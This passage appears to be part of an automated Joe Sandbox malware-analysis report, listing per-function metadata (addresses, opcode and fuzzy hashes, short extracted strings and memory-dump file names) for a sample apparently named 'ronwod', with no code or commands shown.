API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: 5df3944b5f335fde5ee67b9dacc113f6b634005310ff36103767108f0708edf3
Instruction ID: 0d2825b977275b2bea94327f92175dd0307798eb8e28c4f05bb7d42ff2e7c3c1
Opcode Fuzzy Hash: 5df3944b5f335fde5ee67b9dacc113f6b634005310ff36103767108f0708edf3
Instruction Fuzzy Hash: E312AD706083019FD725DF28C890AAFBBE6FFD8714F15892EE595873B1D73198458B82

Function 01454161 Relevance: 1.7, Strings: 1, Instructions: 448COMMON

Download Yara Rule

Strings

D]+\, xrefs: 01454400

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: D]+\
API String ID: 2994545307-1174097187
Opcode ID: 5ea7dc9bd3a7cdcb74f6320de64c95586dc9b08adcce909f10ee81c054f6d7ce
Instruction ID: f0b583e723a97f20217480b250b4ed76255b474a57c3c0799e5cf9ca9f264b07
Opcode Fuzzy Hash: 5ea7dc9bd3a7cdcb74f6320de64c95586dc9b08adcce909f10ee81c054f6d7ce
Instruction Fuzzy Hash: F0B135316083159BE7249E1CE88177FB7E2EFC4704F5A443DEE859B3B6E27199908781

Function 0146CE60 Relevance: 1.6, Strings: 1, Instructions: 392COMMON

Download Yara Rule

Strings

8a, xrefs: 0146CE70

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: 8a
API String ID: 0-1827930058
Opcode ID: 324a8b16eeda3dee098eb4fe2db10d3c88c04df24d7bc9c77e15184b06411164
Instruction ID: e78b23696d2699c3c46db1d33842973150886f7171d08538d1a9309527025da5
Opcode Fuzzy Hash: 324a8b16eeda3dee098eb4fe2db10d3c88c04df24d7bc9c77e15184b06411164
Instruction Fuzzy Hash: 86B1B47160C3818BE729CF2AC45536BFBE5AFD6304F58886EE0D6973A1D7798405CB12

Function 0147FB10 Relevance: 1.6, Strings: 1, Instructions: 360COMMON

Download Yara Rule

Strings

mLjL, xrefs: 0147FB90

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: mLjL
API String ID: 2994545307-1911556848
Opcode ID: 69d6ecd2b66deda1d2a4f0f654d38b6c5d7f0057eea98a386069773e8dd431c1
Instruction ID: ff1be00879c58812971e09256bbde8e02e8c4ae702715592c8099cef91668927
Opcode Fuzzy Hash: 69d6ecd2b66deda1d2a4f0f654d38b6c5d7f0057eea98a386069773e8dd431c1
Instruction Fuzzy Hash: 6CB10832A147118BD728CF28C8915BFB7E2FFC4714F19893DD99A573A1DA31AC458782

Function 01448E50 Relevance: 1.5, Strings: 1, Instructions: 272COMMON

Download Yara Rule

Strings

XqR, xrefs: 01448F8B

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: XqR
API String ID: 0-4205905425
Opcode ID: e9b549860dc5eecda24e6e66b7a3a99159d9fe7ee378efa78ee88bba9d1439d5
Instruction ID: 848bcc851348d2fb83a5448cc007ff583229d4a4037d6a1eb08ff2a2fada6682
Opcode Fuzzy Hash: e9b549860dc5eecda24e6e66b7a3a99159d9fe7ee378efa78ee88bba9d1439d5
Instruction Fuzzy Hash: 18710F7064C3868BE311DF79D0A03ABFBE0AF96344F08446DE9C19B392D37A81099756

Function 01461E60 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

'', xrefs: 01461EA8

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: ''
API String ID: 0-2284169615
Opcode ID: 6a7ef37e93f04ece30a4e2daa78505dd823b5622685911f4ee3f30c4de80eab4
Instruction ID: 8be559b718969873a75d955d590e269b29161dd6ababb0c52c9db469e56becd2
Opcode Fuzzy Hash: 6a7ef37e93f04ece30a4e2daa78505dd823b5622685911f4ee3f30c4de80eab4
Instruction Fuzzy Hash: 0271F1B0604301ABD7149F24CCA1B6B77B9EF91758F04491DFA868B3A1E3B5D904C762

Function 0145D900 Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

~, xrefs: 0145D9CB

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 7179f5b2fc398b586020ea67a10d2cf5e5fbc89a314ccddfce6c733ed80a808a
Instruction ID: 10823f042f168cba56108302348796d494d18be3fd1ea56f584adb6539af5446
Opcode Fuzzy Hash: 7179f5b2fc398b586020ea67a10d2cf5e5fbc89a314ccddfce6c733ed80a808a
Instruction Fuzzy Hash: 7D814C72A042614FDB22CE68C85036FBBD1AF85224F19C67EDCB99B396D6349C45C7C1

Function 014773D0 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

`', xrefs: 0147758C

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: `'
API String ID: 0-2167327795
Opcode ID: 91496f2717543ea028079e70e2cd86b6fcc0d575298fe328bc32889010d7d404
Instruction ID: f5f4d5ef8fdb6bbc2bd5e3ee0cdab9e418c925432098942b7f1a1f21059fab9f
Opcode Fuzzy Hash: 91496f2717543ea028079e70e2cd86b6fcc0d575298fe328bc32889010d7d404
Instruction Fuzzy Hash: 827135235283514AD3109B3CC9440ABBBE3AFD5321F698A3ED5D597769E279C4068353

Function 014595FD Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

Q R , xrefs: 01459759

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: Q R
API String ID: 0-3646680613
Opcode ID: 794fcb1bad76d54c4c5675484b6a0f3650b365588e1fcfbb11eb4c13b3c2725f
Instruction ID: 7e613a8eccb1aa7a0adc7b9b42d8870b663fbf9edde197cfe703342f1488b325
Opcode Fuzzy Hash: 794fcb1bad76d54c4c5675484b6a0f3650b365588e1fcfbb11eb4c13b3c2725f
Instruction Fuzzy Hash: AB41C070504211DBC7399F28C8946BBB3B6FFA2354F054A1DE9CA4B3B2EB354941C792

Function 0146B48C Relevance: 1.4, Strings: 1, Instructions: 196COMMON

Download Yara Rule

Strings

EVJ_, xrefs: 0146B52B

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: EVJ_
API String ID: 0-352177915
Opcode ID: acd0387fefa3c29bfd67b2cd99c61965000bb3a5bca4510c210982c0e0bf02a3
Instruction ID: e9f8d4e7889e0799ea1c7c6191095a7f2a7a6a362da82afef8d206683cc3deea
Opcode Fuzzy Hash: acd0387fefa3c29bfd67b2cd99c61965000bb3a5bca4510c210982c0e0bf02a3
Instruction Fuzzy Hash: 7D51133160A3914AE725CB29C4543ABFBE2EFD3308F28C4AEC4C9972A2DB3544068752

Function 0146B841 Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

Nv, xrefs: 0146B8EF

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: Nv
API String ID: 0-2521146493
Opcode ID: 1e1b04f2686f6ed97515d17f0d8a927edef6c3e74377d33f89c92efec913e3cf
Instruction ID: 33a424c0257774a1687a27ef3cbc5c5d1b8b6bbe701f674b13b6dc6347c04263
Opcode Fuzzy Hash: 1e1b04f2686f6ed97515d17f0d8a927edef6c3e74377d33f89c92efec913e3cf
Instruction Fuzzy Hash: 2F51F4756083818BE339CB29C8507FBB7E1EFD6305F58886EC4CAD7265EB3444098B52

Function 0147FF00 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

@, xrefs: 0147FFCA

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: e2bf7753307426e9cf02c81571a92a252d226505ad20829d9c0c4190ad7a1c08
Instruction ID: 7e00a089ab3bebdbe8b081d5f3c024206df93da6d1eee49715033a755ca4b870
Opcode Fuzzy Hash: e2bf7753307426e9cf02c81571a92a252d226505ad20829d9c0c4190ad7a1c08
Instruction Fuzzy Hash: 854154B29153019BD3148F18CC15BAFBBE2FFC5328F19892DE5951B3A0E775980AC782

Function 0144C942 Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

G9, xrefs: 0144C992

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: G9
API String ID: 0-2716091189
Opcode ID: f73e53cfac15689c9adcde7123c5222815c927a6d86575585a929c85e6a73fc8
Instruction ID: d7afbf4e3d22d78e5406e232d5f316ec0a5c3c372ecf72d59ea626ca227bc035
Opcode Fuzzy Hash: f73e53cfac15689c9adcde7123c5222815c927a6d86575585a929c85e6a73fc8
Instruction Fuzzy Hash: E64123726483218BD728CF25CC517AFB7B2EFC5314F0A591CE4866BB64E7789504C786

Function 0146904E Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

Dkpk, xrefs: 014690A0, 0146916B

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: Dkpk
API String ID: 0-2230318481
Opcode ID: 329dbf892a52ba54e5f58f583f7ff55a97dfda07371a2f062407cd992969aaea
Instruction ID: b9dcfe9e81f5a1dc9edd4a85507950fa5645d30211ab78298e319c91c20d214b
Opcode Fuzzy Hash: 329dbf892a52ba54e5f58f583f7ff55a97dfda07371a2f062407cd992969aaea
Instruction Fuzzy Hash: B131EEB66083018FD7109F59C85126BB3F2EFC5358F09882DE6918B361E778D841C752

Function 0147F040 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

@, xrefs: 0147F090

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 96d6f7d960d613256d899bc1d46e171118898ce61f2f9befd6aa16a70a6c2394
Instruction ID: f9b9f6bf32c101080798f107b1619a1bc7a08bd09815a6987afdf47754d2c559
Opcode Fuzzy Hash: 96d6f7d960d613256d899bc1d46e171118898ce61f2f9befd6aa16a70a6c2394
Instruction Fuzzy Hash: 0221AEB51193049BD320CF18E8806AFB7F5FFC5324F15592DE59897360E372A948C792

Function 0144C08B Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

|X|X, xrefs: 0144C0EF

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: |X|X
API String ID: 0-2218283020
Opcode ID: b380c86e7c308aa2f3b0c12ee75b112ecc1be43bcab046591c2c7c683bdadfa6
Instruction ID: 78d28aa927d229bd18c7f80e94a1854b345905de0322d35a3762bb4f639cf89f
Opcode Fuzzy Hash: b380c86e7c308aa2f3b0c12ee75b112ecc1be43bcab046591c2c7c683bdadfa6
Instruction Fuzzy Hash: 4B21A2BAE006228BC725CF58C895BAEF7B0FF49700F064228ED49BB760D635AC4187D4

Function 0144C158 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

|X|X, xrefs: 0144C1BF

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: |X|X
API String ID: 0-2218283020
Opcode ID: 57430c1fd554e33a77c9f94278ac3c38b74598c914afbcde76da5437b683781a
Instruction ID: 336d015a1d5edde46b3a5fb23724c32bc5cbb238ad6c48c41a4dd21957caed75
Opcode Fuzzy Hash: 57430c1fd554e33a77c9f94278ac3c38b74598c914afbcde76da5437b683781a
Instruction Fuzzy Hash: 291190B6E006229BD721CF68CC81BAAF7B1BF49700F065115E919F7360D671ED528794

Function 01442ED0 Relevance: .7, Instructions: 674COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5870533569efa0aafd84a2afec9604f957245bd34e303aef30039d81a64197d6
Instruction ID: f3f663e15c844ca8de7a027f4d41da57f9b1a30f45813484f9f4378ad1838b5a
Opcode Fuzzy Hash: 5870533569efa0aafd84a2afec9604f957245bd34e303aef30039d81a64197d6
Instruction Fuzzy Hash: D45202355083558FE715CF28C0906EABBE1BF88714F188A6EF8995B362D774E849CF81

Function 01446640 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a82e69f220f21ce4cbffc6a1c0aa0ecd80eae448c05eec25cc45b96f34fd690
Instruction ID: 0424afc4f177ba538c74db99926bc69e308c05c2e8aee401057b4aac9b3e38a2
Opcode Fuzzy Hash: 4a82e69f220f21ce4cbffc6a1c0aa0ecd80eae448c05eec25cc45b96f34fd690
Instruction Fuzzy Hash: 9F52C2B0908B849FF736CB28C4943A7BBE1AB53314F158C6FC5E606B93C379A5868715

Function 0147E710 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f51ad224f578428b1d6a857aed8ec8c54e9390018e0eed4805734b36bab4d981
Instruction ID: e3af7f3a79b2dd1067ffbd6b0a271c44ff4dd751a7140e6e82e3f790cecfbb4a
Opcode Fuzzy Hash: f51ad224f578428b1d6a857aed8ec8c54e9390018e0eed4805734b36bab4d981
Instruction Fuzzy Hash: CD121235A18215CFC714CF28D4902AEB3E2FFC9319F1A88BDDA46973A5E7359951CB80

Function 01447410 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e146d9e79c543f870ee6916604a8e8036e439f7ac644d997363382936f2289b5
Instruction ID: cc0e6361c4ed8c78b7397d9ffe91d97100a25b946ca356585b4136d5c8274673
Opcode Fuzzy Hash: e146d9e79c543f870ee6916604a8e8036e439f7ac644d997363382936f2289b5
Instruction Fuzzy Hash: 1822C431A087518BE725DF1CD9806ABB3E1FFC431AF19892EDAC697395D734A412CB42

Function 014438F0 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a50a9db4214983c37e4dc7fdf36a8f0499cca72ae5273d0dc0dcef78b420f7ff
Instruction ID: c023b47fe7e46a0bc70cbb220cb86f0768da7f6365091788c3894e3eb5b49d60
Opcode Fuzzy Hash: a50a9db4214983c37e4dc7fdf36a8f0499cca72ae5273d0dc0dcef78b420f7ff
Instruction Fuzzy Hash: 26324670915B218FE338CF29C69052ABBF1BF45A10B544A2ED6A787FA1D736F845CB10

Function 0147E820 Relevance: .6, Instructions: 567COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82dc681ca34e79f2d63a11ca9a95b5e8a893569668629ce788b57449ce43c0e1
Instruction ID: 18eca54c6e265dd9ca2ea8611e268ca25a3f9997deb167c94f9187bcd40d5212
Opcode Fuzzy Hash: 82dc681ca34e79f2d63a11ca9a95b5e8a893569668629ce788b57449ce43c0e1
Instruction Fuzzy Hash: DD02F231618211CFC714CF28D4906AEB3F2FBC9319F1A88BDDA46973A5E7359951CB81

Function 01456777 Relevance: .5, Instructions: 533COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 722a3155ffab0ca23799ca6ac4f685186e52ab6522cc19784c233a9979d9ca15
Instruction ID: 6cc276479e16a48ddf72c26953cffd41545e1068e127047fb3985d67e944b2d8
Opcode Fuzzy Hash: 722a3155ffab0ca23799ca6ac4f685186e52ab6522cc19784c233a9979d9ca15
Instruction Fuzzy Hash: 79E178729187118BE329CF28C8503BFB7E2EFD1314F1A492DD8C6973A2D6319845CB91

Function 014786C0 Relevance: .5, Instructions: 513COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ce41e39d15c0e211b756ce805d035f29eb8d2facc3780fd5a52c1cf3adbaf8b
Instruction ID: fd1cededddf75de7365d1212ce5b98c064971f904ae26472fb0a506028ec7db7
Opcode Fuzzy Hash: 6ce41e39d15c0e211b756ce805d035f29eb8d2facc3780fd5a52c1cf3adbaf8b
Instruction Fuzzy Hash: 29E14672A083168FE724DE29D9847BBB7D2FFC4304F09853DEA88673A5D6719C458782

Function 0145B729 Relevance: .5, Instructions: 502COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a98002f0b146f5520d90a1c10974a988e72268b13c73cb3888d94e87fc33ffe0
Instruction ID: d2fab85b28ee680b8f749bbf2216238618b09eaebae877770bfdac25ee4548ad
Opcode Fuzzy Hash: a98002f0b146f5520d90a1c10974a988e72268b13c73cb3888d94e87fc33ffe0
Instruction Fuzzy Hash: E9E1DC756006018BC729CF29C491A23B7F2FF9A310B19869ED8968F7B6E734E845CB54

Function 0147E920 Relevance: .5, Instructions: 484COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 641899085b46cb9bdc77a0a7c44d70a79dbdca6b8d4b7340c246fed00e77e898
Instruction ID: ad9803a979d49b7cb41b9e28576ec6148f373a2ad759e601f58bab25ac34ac8e
Opcode Fuzzy Hash: 641899085b46cb9bdc77a0a7c44d70a79dbdca6b8d4b7340c246fed00e77e898
Instruction Fuzzy Hash: 92F1F231A18211CFC718CF28D4906AE73F2FBC9319F1A88BDD946973A5E7359951CB81

Function 0147EA60 Relevance: .5, Instructions: 476COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd32766ac5284930591fcd601012a4f70cf631ea749fd59bdd6d068b72bd57b8
Instruction ID: 5c6aabf6365460e756222844b252dc9de1665c7e004ec4e49f1294638f4f50e9
Opcode Fuzzy Hash: cd32766ac5284930591fcd601012a4f70cf631ea749fd59bdd6d068b72bd57b8
Instruction Fuzzy Hash: 7EE10332A186158FD718CF28D4506BFB3E2EFC9304F0A897DD986A73A5EB359941C741

Function 0147E9D0 Relevance: .4, Instructions: 446COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfa5283a77ea63813395033244d02c8add4753d6c1495566f48e9edffc6ea615
Instruction ID: b86d29443b0aa7dfc9213a443f8c1178f45f7b027356505e5ccfd29db0e1c14a
Opcode Fuzzy Hash: dfa5283a77ea63813395033244d02c8add4753d6c1495566f48e9edffc6ea615
Instruction Fuzzy Hash: 38E1F131A18215CFC718CF28D4906AEB3F2FBC9314F1A897DD946A73A5EB359941CB81

Function 01465A90 Relevance: .4, Instructions: 414COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e6c7200fef33e6a1d8f4b2036db5db32e0099f5b7a7e88ed70d91d696986295
Instruction ID: cdca15d80d98f3e965cec5fd0a54e0036efb2a58bff084155146b212162255bc
Opcode Fuzzy Hash: 2e6c7200fef33e6a1d8f4b2036db5db32e0099f5b7a7e88ed70d91d696986295
Instruction Fuzzy Hash: 53E10EB1508304CFE720EF64D89176FB7E5FBA5308F41892EE6858B3A5E7749805CB82

Function 01445930 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec9827aaea15cf7a832fb6e9205595bc42e41cb49d1e93da80b2c9735a134d7c
Instruction ID: 6be9df6d639c7455a108c038dbaacd497694df4c51dfcc8168070348465649aa
Opcode Fuzzy Hash: ec9827aaea15cf7a832fb6e9205595bc42e41cb49d1e93da80b2c9735a134d7c
Instruction Fuzzy Hash: 10E17C711087418FE721CF29C880A6BBBE1EF98200F448D2EE5D58B761E375E949CB96

Function 01478FD9 Relevance: .4, Instructions: 398COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 657b06da4254c4443729714fe4e9d78dbdd5d2ea5a426bb874ba067886647b50
Instruction ID: cf71fd32f3a1319d7df75bb02fcdd59dd3cc9db72c7de1a55fe904801510bc69
Opcode Fuzzy Hash: 657b06da4254c4443729714fe4e9d78dbdd5d2ea5a426bb874ba067886647b50
Instruction Fuzzy Hash: 5FD1D17A628252CBCB289F38E8611BE73F2FF89755F4AC47DC5414B2A4E7368960C701

Function 01462140 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e2d704e8b01871602458f9ba77a950431a25295cd247fc537b5773645a8965a
Instruction ID: f90bd120b3932bdd912a7e044730ad3ce5798b6e82d08c19d292b5c9dcf4e548
Opcode Fuzzy Hash: 2e2d704e8b01871602458f9ba77a950431a25295cd247fc537b5773645a8965a
Instruction Fuzzy Hash: 44A1F371A04311ABD720DF28C851A6BB3E9FF94358F05492EE9859B3A1F3B4E945C393

Function 0146C8D0 Relevance: .4, Instructions: 364COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d6555f88731cec9034fb5bee69650e2fd884bfedecefa03384dbf8d758b5af7
Instruction ID: b8b3c611e394bc080424ed6f16b3eb34f7abc51a78051a4d4d163769ab418774
Opcode Fuzzy Hash: 2d6555f88731cec9034fb5bee69650e2fd884bfedecefa03384dbf8d758b5af7
Instruction Fuzzy Hash: 31A1B57160C3818BE729CF2AC8513ABFBE5AFD6304F18886EE4D5973A1D7798405CB52

Function 01465ACF Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b7c3c814b29d6357acc5bb8cd37aeeb6c315f8dcd214a3bfb6daf9554d20c4
Instruction ID: 64ebb5fc80dd85a227d86b39a218070c28a97a274d0b7b262301e13cbcd4fbb9
Opcode Fuzzy Hash: 73b7c3c814b29d6357acc5bb8cd37aeeb6c315f8dcd214a3bfb6daf9554d20c4
Instruction Fuzzy Hash: FAA145315483558BD720DB5884401BBBBA9EF15348F4A893ED9C68B3A2E334E946D7D3

Function 0147F780 Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9747f2af9d94aabb824f9af1b9a3dee1fb41107c7cc5316e6c6744933926a673
Instruction ID: d8d7ec7d156c1b80cd2f6cb10a4df9454c23d3bd6f025afaca3019a246709bf2
Opcode Fuzzy Hash: 9747f2af9d94aabb824f9af1b9a3dee1fb41107c7cc5316e6c6744933926a673
Instruction Fuzzy Hash: 23A1D075A087219BC725DF1CC8805AFB7E2BF88710F19852DEAA59B3A1E771EC05C781

